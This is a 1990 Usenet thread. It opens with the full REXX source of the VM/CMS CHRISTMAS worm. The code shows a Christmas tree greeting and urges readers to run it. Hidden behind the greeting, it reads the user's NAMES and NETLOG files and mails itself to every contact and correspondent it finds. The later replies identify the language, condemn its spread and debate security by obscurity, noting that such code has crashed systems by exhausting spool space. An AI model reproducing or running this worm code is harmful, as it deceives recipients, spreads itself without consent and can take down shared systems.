root@KESTREL.UKC.AC.UK (09/11/90)
/*********************/
/* LET THIS EXEC */
/* */
/* RUN */
/* */
/* AND */
/* */
/* ENJOY */
/* */
/* YOURSELF! */
/*********************/
'VMFCLEAR'
SAY ' * '
SAY ' * '
SAY ' *** '
SAY ' ***** '
SAY ' ******* '
SAY ' ********* '
SAY ' ************* A'
SAY ' ***** '
SAY ' ********* VERY'
SAY ' ************* '
SAY ' ***************** HAPPY'
SAY ' ********* '
SAY ' ************* CHRISTMAS'
SAY ' ***************** '
SAY ' ********************* AND'
SAY ' ************* '
SAY ' ***************** BEST WISHES'
SAY ' ********************* '
SAY ' ************************* FOR THE NEXT'
SAY ' ***** '
SAY ' ***** YEAR '
SAY ' ***** '
/* browsing this file is no fun at all
just type CHRISTMAS from CMS */
dropbuf
makebuf
"q t (stack"
pull d1 d2 d3 d4 d5 dat
pull zline
year = substr(dat,7,2)
day = substr(dat,4,2)
month = substr(dat,1,2)
if year <= 88 then do
if month < 2 ] month = 12 then do
DROPBUF
MAKEBUF
"IDENTIFY ( FIFO"
PULL WHO FROM WHERE IS REMAINING
DROPBUF
MAKEBUF
"EXECIO * DISKR " WHO " NAMES A (FIFO"
DO WHILE QUEUED() >0
PULL NICK NAME ORT
NAM =INDEX(NAME,'.')+1
IF NAM>0 THEN DO
NAME=SUBSTR(NAME,NAM)
END
NAM = INDEX(ORT,'.')+1
IF NAM >0 THEN DO
ORT=SUBSTR(ORT,NAM)
END
IF LENGTH(NAME)>0 THEN DO
ORT=WHERE
END
if name ^="RELAY" then do
"SF CHRISTMAS EXEC A " NAME " AT " ORT " (ack"
end
END
END
DROPBUF
MAKEBUF
AMT=1
"EXECIO * DISKR " WHO " NETLOG A (FIFO"
DO WHILE QUEUED()>0
PULL KIND FN FT FM ACT FROM ID AT NODE REMAINING
IF ACT='SENT' THEN DO
IF AMT=1 THEN DO
OK.AMT=ID
END
IF AMT>1 THEN DO
OK.AMT=ID
NIXIS=0
DO I=1 TO AMT-1
IF OK.I=ID THEN DO
NIXIS=1
END
END
END
AMT=AMT+1
IF NIXIS=0 THEN DO
"SF CHRISTMAS EXEC A " ID " AT " NODE " (ack"
END
END
END
DROPBUF
END
end
end
g7ahn@cc.imperial.ac.UK (Costas Krallis G7AHN) (09/13/90)
It looks like IBM JCL to me. Unfortunately our departmental IBM 4341 running VM/CMS is not networked. :-) Costas Krallis G7AHN London, UK
spl@cs.nps.navy.mil (Steve Lamont) (09/13/90)
In article <9009122126.aa05627@mvax.cc.ic.ac.uk> g7ahn@cc.imperial.ac.uk writes: >It looks like IBM JCL to me. Unfortunately our departmental >IBM 4341 running VM/CMS is not networked. :-) Close. It's REXX, one of IBM's VM/CMS EXEC language. Fie on spreaders of stuff like this. spl (the p stands for pits of hell are too good for them...) -- Steve Lamont, SciViGuy -- (408) 646-2752 (subject to change at random) NPS Confuser Center / Code 51 / Naval Postgraduate School / Monterey, CA 93940 "You're okay," said Honeysuckle. "The dogs like you." - Charles Bukowski, "How to Get Published"
abc@Matrix.COM (Alan Clegg) (09/13/90)
In article <1411@cs.nps.navy.mil> spl@cs.nps.navy.mil (Steve Lamont) writes: >In article <9009122126.aa05627@mvax.cc.ic.ac.uk> g7ahn@cc.imperial.ac.uk writes: >>It looks like IBM JCL to me. Unfortunately our departmental >>IBM 4341 running VM/CMS is not networked. :-) > >Close. It's REXX, one of IBM's VM/CMS EXEC language. > >Fie on spreaders of stuff like this. Nix on Fie. If you think people couldn't write things like this without seeing it, you must be mistaken. This is the MOST SIMPLISTIC hack ever. If you are going to post something, post something that the average LUSER could NOT do. 8-) (or not). > > spl (the p stands for > pits of hell are too > good for them...) ^^^^^^^^^^^^^^^^^^^^^^ I guess this means that "SECURITY BY OBSCURITY" is the way to go, huh? The fact that Unix World (or some such) published the base of the Internet worm, and that you can PURCHASE the REAL SOURCE to the worm from some hacker magazine means that they too should burn? Gee, I guess Gene Spafford should not have published his paper on the worm... might give me some ideas... NAH..... -- Alan B. Clegg uucp: ...!mcnc!matrx!abc Matrix Corporation inet: abc@matrix.com Raleigh, NC "They were all wrong. The workstation model is obsolete." A. Tanenbaum
spl@cs.nps.navy.mil (Steve Lamont) (09/14/90)
In article <1990Sep13.145046.7262@Matrix.COM> /dev/null writes: >Nix on Fie. If you think people couldn't write things like this without seeing >it, you must be mistaken. This is the MOST SIMPLISTIC hack ever. > >If you are going to post something, post something that the average LUSER could >NOT do. 8-) (or not). You misunderstand my reply. I would just rather that things like this not be spread around. We have a VM/CMS system and some moron here is likely to try it out without understanding what they're doing. We had one joker pull a similar stunt and crash the system when it ran out of spool space. >I guess this means that "SECURITY BY OBSCURITY" is the way to go, huh? > >The fact that Unix World (or some such) published the base of the Internet >worm, and that you can PURCHASE the REAL SOURCE to the worm from some hacker >magazine means that they too should burn? > >Gee, I guess Gene Spafford should not have published his paper on the worm... >might give me some ideas... > >NAH..... Sorry, but I guess I didn't make myself terribly clear. I am not opposed to discussing security matters. The original posting was *not* a discussion of this rather simplistic "worm," though. It was simply the worm itself, with no commentary, analysis, or discussion whatever. In the text of the code was the admonition "don't waste your time reading this, just run it" or words to that effect. I'll be happy to discuss the structure of this piece of junk in any open forum. I'll even explain to the non-REXX literate how it works and suggest ways of making it more obtuse with a liberal sprinkling of "Interpret" instructions to obscure some of the more obvious parts of it, if you wish. If anyone believed that I was criticising the follow up poster (and I can, in retrospect, see how that interpretation might be honestly made), I assure them that this was not my intention. Just another reminder that in this essentially written medium, one must be conscious that readers will naturally interpret words in different ways. spl (the p stands for pink, as in blushing.) -- Steve Lamont, SciViGuy -- (408) 646-2752 (subject to change at random) NPS Confuser Center / Code 51 / Naval Postgraduate School / Monterey, CA 93940 "You're okay," said Honeysuckle. "The dogs like you." - Charles Bukowski, "How to Get Published"